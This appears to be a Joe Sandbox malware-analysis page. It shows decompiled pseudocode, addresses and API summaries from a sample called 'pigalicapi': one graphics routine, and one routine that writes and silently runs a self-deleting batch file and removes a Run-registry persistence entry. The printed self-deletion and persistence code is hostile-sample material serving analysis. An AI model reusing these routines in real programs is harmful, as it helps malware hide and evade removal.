                                                                                                                                                                                                                                                                                          				void* _t207;
                                                                                                                                                                                                                                                                                          				signed int _t208;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t184 = __edx;
                                                                                                                                                                                                                                                                                          				_t90 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v12 = _t90 ^ _t208;
                                                                                                                                                                                                                                                                                          				_t92 = _a24;
                                                                                                                                                                                                                                                                                          				_t155 = _a20;
                                                                                                                                                                                                                                                                                          				_t201 = _a4;
                                                                                                                                                                                                                                                                                          				_v132 = __ecx;
                                                                                                                                                                                                                                                                                          				_v96 = _t201;
                                                                                                                                                                                                                                                                                          				_v92 = _t92;
                                                                                                                                                                                                                                                                                          				_v100 = __edx;
                                                                                                                                                                                                                                                                                          				_v120 = _a28;
                                                                                                                                                                                                                                                                                          				if(_t92 == 0) {
                                                                                                                                                                                                                                                                                          					_t184 =  *_t201;
                                                                                                                                                                                                                                                                                          					_t92 = CreateCompatibleDC( *_t201);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v80 = _t92;
                                                                                                                                                                                                                                                                                          				if(_t92 == 0) {
                                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                                          					return E008159E6(0, _t155, _v12 ^ _t208, _t184, _t201, _t206);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t206 = CreateCompatibleDC( *_t201);
                                                                                                                                                                                                                                                                                          					_v88 = _t206;
                                                                                                                                                                                                                                                                                          					if(_t206 != 0) {
                                                                                                                                                                                                                                                                                          						_v56 = _a16;
                                                                                                                                                                                                                                                                                          						_t186 =  &_v60;
                                                                                                                                                                                                                                                                                          						_v60.bmiHeader = 0x28;
                                                                                                                                                                                                                                                                                          						_v52 = _t155;
                                                                                                                                                                                                                                                                                          						_v48 = 0x10001;
                                                                                                                                                                                                                                                                                          						_v44 = 0;
                                                                                                                                                                                                                                                                                          						_v40 = 0;
                                                                                                                                                                                                                                                                                          						_v36 = 0;
                                                                                                                                                                                                                                                                                          						_v32 = 0;
                                                                                                                                                                                                                                                                                          						_v28 = 0;
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						_v60.bmiColors = 0;
                                                                                                                                                                                                                                                                                          						_v16 = 0xffffff;
                                                                                                                                                                                                                                                                                          						_t98 = CreateDIBSection(_t206,  &_v60, 0,  &_v136, 0, 0);
                                                                                                                                                                                                                                                                                          						_v116 = _t98;
                                                                                                                                                                                                                                                                                          						if(_t98 != 0) {
                                                                                                                                                                                                                                                                                          							_t207 = SelectObject;
                                                                                                                                                                                                                                                                                          							_v124 = SelectObject(_t206, _t98);
                                                                                                                                                                                                                                                                                          							_t202 = CreateCompatibleDC( *_t201);
                                                                                                                                                                                                                                                                                          							_v84 = CreateCompatibleDC( *_v96);
                                                                                                                                                                                                                                                                                          							_v104 = CreateCompatibleBitmap(_v80, _a16, _t155);
                                                                                                                                                                                                                                                                                          							_v108 = CreateBitmap(_a16, _t155, 1, 1, 0);
                                                                                                                                                                                                                                                                                          							_v128 = SelectObject(_t202, _v104);
                                                                                                                                                                                                                                                                                          							_v112 = SelectObject(_v84, _v108);
                                                                                                                                                                                                                                                                                          							BitBlt(_t202, 0, 0, _a16, _t155, _v80, 0, 0, 0xcc0020);
                                                                                                                                                                                                                                                                                          							SetBkColor(_t202, 0x808080);
                                                                                                                                                                                                                                                                                          							BitBlt(_v84, 0, 0, _a16, _t155, _t202, 0, 0, 0xcc0020);
                                                                                                                                                                                                                                                                                          							BitBlt(_t202, 0, 0, _a16, _t155, _v84, 0, 0, 0x660046);
                                                                                                                                                                                                                                                                                          							BitBlt(_v88, 0, 0, _a16, _t155, _t202, 0, 0, 0xcc0020);
                                                                                                                                                                                                                                                                                          							SelectObject(_t202, _v128);
                                                                                                                                                                                                                                                                                          							SelectObject(_v84, _v112);
                                                                                                                                                                                                                                                                                          							_t119 = _v108;
                                                                                                                                                                                                                                                                                          							if(_t119 != 0) {
                                                                                                                                                                                                                                                                                          								DeleteObject(_t119);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t120 = _v104;
                                                                                                                                                                                                                                                                                          							if(_t120 != 0) {
                                                                                                                                                                                                                                                                                          								DeleteObject(_t120);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t121 = _v84;
                                                                                                                                                                                                                                                                                          							if(_t121 != 0) {
                                                                                                                                                                                                                                                                                          								DeleteDC(_t121);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if(_t202 != 0) {
                                                                                                                                                                                                                                                                                          								DeleteDC(_t202);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t194 = _v132;
                                                                                                                                                                                                                                                                                          							_t203 = _v96;
                                                                                                                                                                                                                                                                                          							if(_t194 != 0) {
                                                                                                                                                                                                                                                                                          								_t141 = _a12;
                                                                                                                                                                                                                                                                                          								_t178 = _a8;
                                                                                                                                                                                                                                                                                          								_v76.top = _t141;
                                                                                                                                                                                                                                                                                          								_v76.left = _t178;
                                                                                                                                                                                                                                                                                          								_v76.bottom = _t141 + _t155;
                                                                                                                                                                                                                                                                                          								_v76.right = _t178 + _a16;
                                                                                                                                                                                                                                                                                          								FillRect( *_t203,  &_v76, _t194);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v100 = SelectObject( *_t203, _v100);
                                                                                                                                                                                                                                                                                          							BitBlt( *_t203, _a8 + 1, _a12 + 1, _a16, _t155, _v88, 0, 0, 0xb8074a);
                                                                                                                                                                                                                                                                                          							SelectObject( *_t203, _v120);
                                                                                                                                                                                                                                                                                          							BitBlt( *_t203, _a8, _a12, _a16, _t155, _v88, 0, 0, 0xb8074a);
                                                                                                                                                                                                                                                                                          							_t200 =  *_t203;
                                                                                                                                                                                                                                                                                          							SelectObject( *_t203, _v100);
                                                                                                                                                                                                                                                                                          							_t156 = _v88;
                                                                                                                                                                                                                                                                                          							SelectObject(_t156, _v124);
                                                                                                                                                                                                                                                                                          							_t204 = _v80;
                                                                                                                                                                                                                                                                                          							SelectObject(_t204, 0);
                                                                                                                                                                                                                                                                                          							if(_v92 == 0) {
                                                                                                                                                                                                                                                                                          								DeleteDC(_t204);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							DeleteObject(_v116);
                                                                                                                                                                                                                                                                                          							DeleteDC(_t156);
                                                                                                                                                                                                                                                                                          							return E008159E6(1, _t156, _v12 ^ _t208, _t200, _t204, _t207);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t205 = DeleteDC;
                                                                                                                                                                                                                                                                                          							if(_v92 == _t98) {
                                                                                                                                                                                                                                                                                          								DeleteDC(_v80);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							DeleteDC(_t206);
                                                                                                                                                                                                                                                                                          							return E008159E6(0, _t155, _v12 ^ _t208, _t186, _t205, _t206);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						if(_v92 == 0) {
                                                                                                                                                                                                                                                                                          							DeleteDC(_v80);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















































                                                                                                                                                                                                                                                                                          0x00813960
                                                                                                                                                                                                                                                                                          0x00813969
                                                                                                                                                                                                                                                                                          0x00813970
                                                                                                                                                                                                                                                                                          0x00813973
                                                                                                                                                                                                                                                                                          0x00813977
                                                                                                                                                                                                                                                                                          0x0081397c
                                                                                                                                                                                                                                                                                          0x0081397f
                                                                                                                                                                                                                                                                                          0x00813985
                                                                                                                                                                                                                                                                                          0x00813988
                                                                                                                                                                                                                                                                                          0x0081398b
                                                                                                                                                                                                                                                                                          0x0081398e
                                                                                                                                                                                                                                                                                          0x00813993
                                                                                                                                                                                                                                                                                          0x00813995
                                                                                                                                                                                                                                                                                          0x00813998
                                                                                                                                                                                                                                                                                          0x00813998
                                                                                                                                                                                                                                                                                          0x0081399e
                                                                                                                                                                                                                                                                                          0x008139a3
                                                                                                                                                                                                                                                                                          0x008139c8
                                                                                                                                                                                                                                                                                          0x008139da
                                                                                                                                                                                                                                                                                          0x008139a5
                                                                                                                                                                                                                                                                                          0x008139ae
                                                                                                                                                                                                                                                                                          0x008139b2
                                                                                                                                                                                                                                                                                          0x008139b7
                                                                                                                                                                                                                                                                                          0x008139e9
                                                                                                                                                                                                                                                                                          0x008139ed
                                                                                                                                                                                                                                                                                          0x008139f2
                                                                                                                                                                                                                                                                                          0x008139f9
                                                                                                                                                                                                                                                                                          0x008139fc
                                                                                                                                                                                                                                                                                          0x00813a03
                                                                                                                                                                                                                                                                                          0x00813a06
                                                                                                                                                                                                                                                                                          0x00813a09
                                                                                                                                                                                                                                                                                          0x00813a0c
                                                                                                                                                                                                                                                                                          0x00813a0f
                                                                                                                                                                                                                                                                                          0x00813a12
                                                                                                                                                                                                                                                                                          0x00813a15
                                                                                                                                                                                                                                                                                          0x00813a18
                                                                                                                                                                                                                                                                                          0x00813a1f
                                                                                                                                                                                                                                                                                          0x00813a25
                                                                                                                                                                                                                                                                                          0x00813a2a
                                                                                                                                                                                                                                                                                          0x00813a57
                                                                                                                                                                                                                                                                                          0x00813a62
                                                                                                                                                                                                                                                                                          0x00813a6e
                                                                                                                                                                                                                                                                                          0x00813a82
                                                                                                                                                                                                                                                                                          0x00813a91
                                                                                                                                                                                                                                                                                          0x00813aa4
                                                                                                                                                                                                                                                                                          0x00813aac
                                                                                                                                                                                                                                                                                          0x00813acd
                                                                                                                                                                                                                                                                                          0x00813ad0
                                                                                                                                                                                                                                                                                          0x00813adc
                                                                                                                                                                                                                                                                                          0x00813af9
                                                                                                                                                                                                                                                                                          0x00813b16
                                                                                                                                                                                                                                                                                          0x00813b33
                                                                                                                                                                                                                                                                                          0x00813b3e
                                                                                                                                                                                                                                                                                          0x00813b48
                                                                                                                                                                                                                                                                                          0x00813b4a
                                                                                                                                                                                                                                                                                          0x00813b4f
                                                                                                                                                                                                                                                                                          0x00813b52
                                                                                                                                                                                                                                                                                          0x00813b52
                                                                                                                                                                                                                                                                                          0x00813b58
                                                                                                                                                                                                                                                                                          0x00813b5d
                                                                                                                                                                                                                                                                                          0x00813b60
                                                                                                                                                                                                                                                                                          0x00813b60
                                                                                                                                                                                                                                                                                          0x00813b66
                                                                                                                                                                                                                                                                                          0x00813b6b
                                                                                                                                                                                                                                                                                          0x00813b6e
                                                                                                                                                                                                                                                                                          0x00813b6e
                                                                                                                                                                                                                                                                                          0x00813b76
                                                                                                                                                                                                                                                                                          0x00813b79
                                                                                                                                                                                                                                                                                          0x00813b79
                                                                                                                                                                                                                                                                                          0x00813b7f
                                                                                                                                                                                                                                                                                          0x00813b82
                                                                                                                                                                                                                                                                                          0x00813b87
                                                                                                                                                                                                                                                                                          0x00813b89
                                                                                                                                                                                                                                                                                          0x00813b8c
                                                                                                                                                                                                                                                                                          0x00813b8f
                                                                                                                                                                                                                                                                                          0x00813b92
                                                                                                                                                                                                                                                                                          0x00813b9a
                                                                                                                                                                                                                                                                                          0x00813ba1
                                                                                                                                                                                                                                                                                          0x00813ba8
                                                                                                                                                                                                                                                                                          0x00813ba8
                                                                                                                                                                                                                                                                                          0x00813bcb
                                                                                                                                                                                                                                                                                          0x00813bd9
                                                                                                                                                                                                                                                                                          0x00813be6
                                                                                                                                                                                                                                                                                          0x00813c05
                                                                                                                                                                                                                                                                                          0x00813c0e
                                                                                                                                                                                                                                                                                          0x00813c12
                                                                                                                                                                                                                                                                                          0x00813c17
                                                                                                                                                                                                                                                                                          0x00813c1c
                                                                                                                                                                                                                                                                                          0x00813c1e
                                                                                                                                                                                                                                                                                          0x00813c24
                                                                                                                                                                                                                                                                                          0x00813c2a
                                                                                                                                                                                                                                                                                          0x00813c2d
                                                                                                                                                                                                                                                                                          0x00813c2d
                                                                                                                                                                                                                                                                                          0x00813c37
                                                                                                                                                                                                                                                                                          0x00813c3e
                                                                                                                                                                                                                                                                                          0x00813c59
                                                                                                                                                                                                                                                                                          0x00813a2c
                                                                                                                                                                                                                                                                                          0x00813a2c
                                                                                                                                                                                                                                                                                          0x00813a35
                                                                                                                                                                                                                                                                                          0x00813a3b
                                                                                                                                                                                                                                                                                          0x00813a3b
                                                                                                                                                                                                                                                                                          0x00813a3e
                                                                                                                                                                                                                                                                                          0x00813a52
                                                                                                                                                                                                                                                                                          0x00813a52
                                                                                                                                                                                                                                                                                          0x008139b9
                                                                                                                                                                                                                                                                                          0x008139bc
                                                                                                                                                                                                                                                                                          0x008139c2
                                                                                                                                                                                                                                                                                          0x008139c2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008139bc
                                                                                                                                                                                                                                                                                          0x008139b7

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00813998
                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 008139A8
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 008139C2
                                                                                                                                                                                                                                                                                          • CreateDIBSection.GDI32(00000000,00812057,00000000,?,00000000,00000000), ref: 00813A1F
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00813A3B
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00813A3E
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00813A5D
                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32 ref: 00813A65
                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00813A73
                                                                                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 00813A85
                                                                                                                                                                                                                                                                                          • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 00813A99
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00813AA7
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00813AB4
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00CC0020), ref: 00813AD0
                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(00000000,00808080), ref: 00813ADC
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00813AF9
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00660046), ref: 00813B16
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00813B33
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00813B3E
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00813B48
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00813B52
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00813B60
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00813B6E
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00813B79
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 00813BA8
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00813BB5
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,01000000,00000001,00000000,?,?,00000000,00000000,00B8074A), ref: 00813BD9
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00813BE6
                                                                                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,00FFFFFF,00000000,00000000,?,?,00000000,00000000,00B8074A), ref: 00813C05
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00813C12
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00813C1C
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00813C24
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00813C2D
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00813C37
                                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00813C3E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Object$DeleteSelect$Create$Compatible$Bitmap$ColorFillRectSection
                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                          • API String ID: 1654306582-3887548279
                                                                                                                                                                                                                                                                                          • Opcode ID: 4585c1739067250b83ff4e6830931e3253784325d891f78b6e7bfd9162d3759d
                                                                                                                                                                                                                                                                                          • Instruction ID: f8dd3398bfdd27ccb66dc13f4b59dcdd70326440b2d4c4c082a271f320fb6a95
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4585c1739067250b83ff4e6830931e3253784325d891f78b6e7bfd9162d3759d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38B1A9B5A00609AFEB24DFA4DC85FAEBBB9FF48710F10811AF905E7241D674A9418F64
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                                                                                                          			E040074A0() {
                                                                                                                                                                                                                                                                                          				char _v524;
                                                                                                                                                                                                                                                                                          				CHAR* _v528;
                                                                                                                                                                                                                                                                                          				void* _v532;
                                                                                                                                                                                                                                                                                          				void* _v536;
                                                                                                                                                                                                                                                                                          				void* _v540;
                                                                                                                                                                                                                                                                                          				char _v1060;
                                                                                                                                                                                                                                                                                          				char _v1580;
                                                                                                                                                                                                                                                                                          				char _v2364;
                                                                                                                                                                                                                                                                                          				long _v2368;
                                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v2384;
                                                                                                                                                                                                                                                                                          				long _v2388;
                                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v2460;
                                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                                          				void* _t124;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				E04007D20(E04007D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
                                                                                                                                                                                                                                                                                          				_t123 = _t121 + 0x18;
                                                                                                                                                                                                                                                                                          				 *0x4014370 = 1;
                                                                                                                                                                                                                                                                                          				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                          				if(( *0x4014362 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					_v2368 = 0x207;
                                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, "\\");
                                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, "pigalicapi");
                                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, ".exe");
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0,  &_v1060, 0x207);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				SetFileAttributesA( &_v1060, 0x80);
                                                                                                                                                                                                                                                                                          				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
                                                                                                                                                                                                                                                                                          				_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                                          				if( *0x401436c != 0) {
                                                                                                                                                                                                                                                                                          					_t86 =  *0x401436c; // 0x2c8
                                                                                                                                                                                                                                                                                          					TerminateThread(_t86, 1);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v528 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                                          				_v532 = 0x80000001;
                                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					_v532 = 0x80000002;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v536 = 0;
                                                                                                                                                                                                                                                                                          				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
                                                                                                                                                                                                                                                                                          					RegDeleteValueA(_v536, "pigalicapi");
                                                                                                                                                                                                                                                                                          					RegCloseKey(_v536);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					E04005E30(1);
                                                                                                                                                                                                                                                                                          					_t124 = _t124 + 4;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
                                                                                                                                                                                                                                                                                          				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
                                                                                                                                                                                                                                                                                          				lstrcatA( &_v524, ".bat");
                                                                                                                                                                                                                                                                                          				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                          				_v540 = _t71;
                                                                                                                                                                                                                                                                                          				if(_v540 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          					_v2388 = 0;
                                                                                                                                                                                                                                                                                          					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
                                                                                                                                                                                                                                                                                          					E04007D20(E04007D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
                                                                                                                                                                                                                                                                                          					_v2460.cb = 0x44;
                                                                                                                                                                                                                                                                                          					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
                                                                                                                                                                                                                                                                                          					_v2460.wShowWindow = 0;
                                                                                                                                                                                                                                                                                          					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
                                                                                                                                                                                                                                                                                          						_t71 = CloseHandle(_v2384.hThread);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t71;
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x040074cd
                                                                                                                                                                                                                                                                                          0x040074d2
                                                                                                                                                                                                                                                                                          0x040074d5
                                                                                                                                                                                                                                                                                          0x040074e4
                                                                                                                                                                                                                                                                                          0x040074f3
                                                                                                                                                                                                                                                                                          0x0400750b
                                                                                                                                                                                                                                                                                          0x0400751e
                                                                                                                                                                                                                                                                                          0x04007547
                                                                                                                                                                                                                                                                                          0x04007520
                                                                                                                                                                                                                                                                                          0x0400752e
                                                                                                                                                                                                                                                                                          0x0400752e
                                                                                                                                                                                                                                                                                          0x04007559
                                                                                                                                                                                                                                                                                          0x0400756b
                                                                                                                                                                                                                                                                                          0x0400757d
                                                                                                                                                                                                                                                                                          0x040074f5
                                                                                                                                                                                                                                                                                          0x04007503
                                                                                                                                                                                                                                                                                          0x04007503
                                                                                                                                                                                                                                                                                          0x0400758f
                                                                                                                                                                                                                                                                                          0x040075b4
                                                                                                                                                                                                                                                                                          0x040075ba
                                                                                                                                                                                                                                                                                          0x040075c4
                                                                                                                                                                                                                                                                                          0x040075c8
                                                                                                                                                                                                                                                                                          0x040075ce
                                                                                                                                                                                                                                                                                          0x040075ce
                                                                                                                                                                                                                                                                                          0x040075d4
                                                                                                                                                                                                                                                                                          0x040075de
                                                                                                                                                                                                                                                                                          0x040075f1
                                                                                                                                                                                                                                                                                          0x040075f3
                                                                                                                                                                                                                                                                                          0x040075f3
                                                                                                                                                                                                                                                                                          0x040075fd
                                                                                                                                                                                                                                                                                          0x04007628
                                                                                                                                                                                                                                                                                          0x04007636
                                                                                                                                                                                                                                                                                          0x04007643
                                                                                                                                                                                                                                                                                          0x04007643
                                                                                                                                                                                                                                                                                          0x04007652
                                                                                                                                                                                                                                                                                          0x04007656
                                                                                                                                                                                                                                                                                          0x0400765b
                                                                                                                                                                                                                                                                                          0x0400765b
                                                                                                                                                                                                                                                                                          0x0400766f
                                                                                                                                                                                                                                                                                          0x04007698
                                                                                                                                                                                                                                                                                          0x040076aa
                                                                                                                                                                                                                                                                                          0x040076c6
                                                                                                                                                                                                                                                                                          0x040076cc
                                                                                                                                                                                                                                                                                          0x040076d9
                                                                                                                                                                                                                                                                                          0x040076df
                                                                                                                                                                                                                                                                                          0x0400770e
                                                                                                                                                                                                                                                                                          0x0400773f
                                                                                                                                                                                                                                                                                          0x04007747
                                                                                                                                                                                                                                                                                          0x0400775a
                                                                                                                                                                                                                                                                                          0x04007762
                                                                                                                                                                                                                                                                                          0x04007794
                                                                                                                                                                                                                                                                                          0x0400779d
                                                                                                                                                                                                                                                                                          0x0400779d
                                                                                                                                                                                                                                                                                          0x040077a5
                                                                                                                                                                                                                                                                                          0x040077a5
                                                                                                                                                                                                                                                                                          0x040077ae

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 040074E4
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 04007503
                                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 0400752E
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0400C650), ref: 04007559
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,pigalicapi), ref: 0400756B
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.exe), ref: 0400757D
                                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 0400758F
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040075B4
                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(000002C8,00000001), ref: 040075CE
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,0400C690,00000000,00000002,00000000), ref: 04007620
                                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 04007636
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04007643
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 0400766F
                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0400767C
                                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 04007698
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.bat), ref: 040076AA
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 040076C6
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000000), ref: 040076F9
                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000), ref: 0400770E
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0400771B
                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0400778C
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400779D
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 040077A5
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
